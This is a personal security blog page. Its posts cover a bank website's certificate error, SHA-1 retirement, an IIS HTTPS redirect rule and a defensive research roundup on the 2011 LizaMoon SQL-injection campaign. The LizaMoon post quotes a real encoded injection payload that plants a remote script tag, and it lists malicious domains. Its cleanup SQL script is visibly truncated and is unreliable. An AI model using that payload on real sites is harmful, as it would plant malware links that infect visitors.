Showing posts with label Security. Show all posts
Showing posts with label Security. Show all posts

Monday, January 11, 2016

Security issue in Mashreq Bank Official Website

DISCLAIMER: IT’S MY PERSONAL VIEW POINT. THIS ARTICLE IS NOT INTEND FOR DECISION MAKING. PLEASE CONSULT YOUR SECURITY ADVISOR OR CONTACT ME IN PERSON FOR DETAILS.

Mashreq Bank official website may look perfect when entered URL http://www.mashreqbank.com or googled for “Mashreq Bank”.

What’s the problem with Mashreq Bank Official Website?

But is the Mashreq Bank website secure? Not really! 

Security is an essential factor for bank websites. Banks and most sensitive information websites are highly recommended to use a secure layer called TLS (SSL was officially deprecated – read more) to transfer information. Such HTTPS communication will prevent eavesdropping, man-in-the-middle attacks that may lead to Phishing attacks to steal customer internet banking username and password information.

HTTPS (Secured Hyper Text Transfer Protocol) provides the maximum protection from the most notorious hacker attacks for banking websites like phishing and sniffing.

What happens when you try https://www.mashreqbank.com?


Invalid Certificate Notice

I am curious, so what happens when you hit Continue to this website (which was not recommended!)?


Note: Typing the full URL of the website (when known) with https is the safest way to access websites.

What is the Problem (Technically)?

The Mashreq Bank official website (www.mashreqbank.com) SSL Certificate is mapped to a wrong certificate that was issued to the Mashreq Bank’s Career portal (careers.mashreqbank.com).
Note: Unfortunately, the career portal is also down.

CERTIFICATE PATH




Besides, the certificate signature has algorithm is a very weak SHA-1 algorithm which needs to be updated to SHA256 as soon as possible. Read more about SHA-1 Sunset.




Is my Mashreq Online Banking unsafe? 

No, not really! The Net Banking is still safe and well secured. The potential risk is only when you are redirected from Official Website to Net Banking site and other potential attacks such as Phishing and zero-day attacks. 

Besides, Mashreq Bank is a reputed financial institution. You may expect for the best support from the bank during such unfortunate situations.

How am I affected?

Mashreq Bank official website has potential security risk. But the Online Banking portal https://netbanking.mashreq.com is safe and configured with good security systems.


  • Though you cannot do much on the server side, you can protect yourself by not accessing your bank website on public wifi in cafes, public transportation, etc., and securing your home/office wifi networks. 


Mashreq Online Banking Portal - Certificates




HTTPS protects the integrity of your website
By Google:
HTTPS helps prevent intruders from tampering with the communications between your websites and your users’ browsers. Intruders include intentionally malicious attackers, and legitimate but intrusive companies, such as ISPs or hotels that inject ads into pages.
Intruders exploit unprotected communications to trick your users into giving up sensitive information or installing malware, or to insert their own advertisements into your resources. For example, some third-parties inject advertisements into websites that potentially break user experiences and create security vulnerabilities.
Intruders exploit every unprotected resource that travels between your websites and your users. Images, cookies, scripts, HTML… they’re all exploitable. Intrusions can occur at any point in the network, including a user’s machine, a Wi-Fi hotspot, or a compromised ISP, just to name a few.
--

Hope Mashreq will take action very soon.
Cheers!
Arun Ramachandran

Please reach me or leave your comments in the comment section. I'll get back to you as soon as possible.













Posted by at 1 comment:
Labels: , , , ,

SHA-1 Sunset by January, 2017

SHA-1 is a weaker cryptographic hash function and more than 12 years old now. (Time to retire!) All major web browsers have officially announced to SHA-1 Sunset from January, 2017.


Why I should migrate from SHA-1 to SHA-2 now?

All server certificates that expire on/after 1st January, 2017, and which contain SHA-1-based signatures in the validated chain, will be shown the insecure site notification icon in Google Chrome and similar warning notice in other major browsers, with text indicating that the site will cease working in future versions of the browser. This may affect the brand and reputation of the organization among the customers. (Effect on Google SERP is unclear at this point of time. But Google has given clear indication that HTTPS will be a ranking signal.)



Read more about SHA-1 and Future





Posted by at No comments:
Labels: , ,

Sunday, January 04, 2015

How to force redirect all HTTP requests to HTTPS in IIS through Web.Config setting?

Web.config configuration setting to force redirect all http requests to https with all query string parameters in IIS 7.5 / 8.0 on Windows Servers.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <rewrite>
            <rules>
                <clear />
                <rule name="Redirect to https" stopProcessing="true">
                    <match url="(.*)" />
                    <conditions>
                        <add input="{HTTPS}" pattern="off" ignoreCase="true" />
                    </conditions>
                    <action type="Redirect" url="https://{HTTP_HOST}{REQUEST_URI}" redirectType="Permanent" appendQueryString="false" />
                </rule>
            </rules>
        </rewrite>
    </system.webServer>
</configuration>

Notes:

  1. The above solution will work well with all hosts including shared hosting servers
  2. Ensure your https URL is functioning properly
Posted by at No comments:
Labels: , ,

Wednesday, June 06, 2012

Cyberwar - It is happening..


Check this infographic on How US - IRAN secret Cyberwar worked.

http://www.nytimes.com/interactive/2012/06/01/world/middleeast/how-a-secret-cyberwar-program-worked.html?ref=middleeast

After all, Information Technology shouldn't become one danger like Nuclear Technology.

It could, today most systems are computerized and interconnected with networks. Any damage happen will reflect the global economy as the networks expanded with internet.

Today is rebirth of internet protocol with IPV6 launch worldwide. Let's believe and promise we use technology for the good and betterment of humans. At least, definitely not for any destruction.
Posted by at No comments:
Labels: ,

Sunday, April 03, 2011

A research on LizaMoon mass SQL Injection


Video: LizaMoon in action

Websense says..
LizaMoon mass injection hits over 226,000 URLs (was 28,000)
Posted: 29 Mar 2011 10:15 AM
Websense Security Labs and the Websense Threatseeker Network have identified a new malicious mass-injection campaign that we call LizaMoon. Websense customers are protected with the Advanced Classification Engine.
UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen.
UPDATE2: We have been monitoring the attack since it came out and noticed that the number of the compromised URLs is still increasing, 380,000 URLs so far, moreover, more domains started to be involved except for lizamoon.com.
UPDATE3: 500,000 hits at this time. It's growing.

PC World
Millions of Sites Hit with Mass-Injection Cyberattack
By Sarah Jacobsson Purewal, PCWorld    Apr 1, 2011 6:21 AM
Hundreds of thousands -- and possibly millions -- of websites have been hit with a cyberattack that some are calling "one of the biggest mass-injection attacks we've ever seen."

Websense
Update on LizaMoon mass-injection and Q&A

The LizaMoon mass-injection campaign is still ongoing and more than 500,000 pages have a script link to lizamoon.com according to preliminary Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a search on Google returns more than 1,500,000 results that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL or page, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down over time.

Update1: Now the google search returns 1,750,000

Additional injected URLs
Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).

hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php
hxxp://pop-stats.info/ur.php
hxxp://star-stats.info/ur.php
hxxp://multi-stats.info/ur.php
hxxp://google-stats44.info/ur.php
hxxp://books-loader.info/ur.php
hxxp://google-stats73.info/ur.php
hxxp://google-stats47.info/ur.php
hxxp://google-stats50.info/ur.php

Technical Investigation
Jay Barnes said on Wednesday, March 30, 2011 11:54 AM
Also observed hxxp://lizamoon.com/ur.php containing javascript redirect to hxxp://system-scanner-uyxt.co.cc/scan1b/237?sessionId=05005504[...], which was already a dead hostname by the time user received redirect.  Server that contained lizamoon.com reference for this user was hxxp://www.equusnow.com, which appears to be clean at the moment.
Similar (or identical) campaign may involve redirects to hxxp://system-scanner-eopa.co.cc containing fake-av.  Another compromised server, hxxp://hccems.com/hr-adriana-lima-vogue-spain/, earlier today contained javascript code redirecting to system-scanner-eopa.co.cc only if the request used a google referer.  That hccems.com page, with a google referer, currently redirects to hxxp://xz163v92.dyndns-ip.com/3/ (also fake-av).
Maye said on Wednesday, March 30, 2011 5:56 PM
This same attack is now happening with tadygus.com instead of lizamoon.

Antony said on Friday, April 01, 2011 10:44 AM
Just to be clear to those who actually know very little about database servers...a database server is not "vulnerable to SQL injection". Poorly-programmed and secured *applications* are vulnerable to SQL injection. It really annoys me to see databases blamed for poor application development practices.

Toyotawhizguy said on Friday, April 01, 2011 4:54 PM
You can block malicious sites by editing your "hosts" file using Notepad. For example, add the following line:
127.0.0.1 www.lizamoon.com #attack site 03/29/11
You can also list the site's IP address instead of the domain name:
127.0.0.1 95.64.9.18 #attack site 03/29/11
I maintain my "hosts" file as "read only" after editing, this protects it from malicious attacks.

Pete said on Saturday, April 02, 2011 12:11 PM
I am still confused by the SQL injection reference.  Usually, an SQL injection is a vulnerability in an application which is then exploited for an persistent XSS or CSRF.  What application has the SQL injection vulnerability? I get that RSS may pick up the persistent XSS but it has to get into a DB to start with and it can't get into a DB without an app.  Which app has the vulnerability?


Arun: No answer found so far

Websense updated: 1st April 2011 12:16pm PT
The domain stats-master111.info was registered on October 21, 2010 which could mean the first attack happened then but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.

Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.

Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. Initially we only received reports of users running Microsoft SQL Server 2000 and 2005 being hit but since then we have also received reports of websites using Microsoft SQL Server 2008 being injected as well.

Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2003 and 2005?
A: No. Everything points to that this is a vulnerability in a web application. We don't know which one(s) yet but SQL Injection attacks work by issuing SQL commands in unsanitized input to the server. That doesn't mean it's a vulnerability in the SQL Server itself, it means that the web application isn't filtering input from the user correctly.

Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.

Stakoverflow:
Here is an example of the value of the cs-uri-query field for one of the IIS log entries.
surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
I don't understand how the above code works but apparently this is what is being sent in a query string to corrupt columns in our database tables. We have shut down our site for the time being. We can remove the scripts from the database but that doesn't prevent it from being corrupted again when we bring the site back online.

SQL CODE TO IDENTIFY INFECTED TABLES AND COLUMNS
(Test & Working – Arun)
DECLARE c1 cursor for SELECT 'SELECT COUNT(*), '''+QUOTENAME(TABLE_SCHEMA)+'.'+QUOTENAME(TABLE_NAME)+''', '''+QUOTENAME(COLUMN_NAME)+''''+
' FROM ' + quotename(TABLE_SCHEMA) + '.'+QUOTENAME(TABLE_NAME) +
' WHERE ' + QUOTENAME(COLUMN_NAME) + ' LIKE ''%
FROM INFORMATION_SCHEMA.COLUMNS c
WHERE DATA_TYPE IN ('nvarchar', 'nchar', 'varchar', 'char', 'text', 'ntext')
and QUOTENAME(TABLE_NAME) not in (SELECT QUOTENAME(name)AS TABLE_NAME FROM sys.views)
order by QUOTENAME(TABLE_NAME);
DECLARE @CMD VARCHAR(200), @return varchar(10)
OPEN C1
FETCH NEXT FROM C1 INTO @CMD
WHILE @@FETCH_STATUS <> -1
    BEGIN
        declare @sql nvarchar(500), @tbl varchar(200), @col varchar(200)
        set @sql = 'declare c2 cursor for ' + @CMD
        exec sp_executesql @sql
        open c2
        FETCH NEXT FROM C2 INTO @return, @tbl, @col
        WHILE @@FETCH_STATUS <> -1
            BEGIN
            if(@return > 0)
                BEGIN
                    PRINT @return + ' records found in ' + @tbl + '.' + @col
                    exec('SELECT '+@col+' FROM '+@tbl+' WHERE '+@col+' LIKE ''%)
                END
            FETCH NEXT FROM C2 INTO @return, @tbl, @col
            END
        CLOSE C2
        DEALLOCATE C2
        FETCH NEXT FROM C1 INTO @CMD
    END
CLOSE C1
DEALLOCATE C1

..I'll update if I found any news. Please share your experience and solutions.
Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)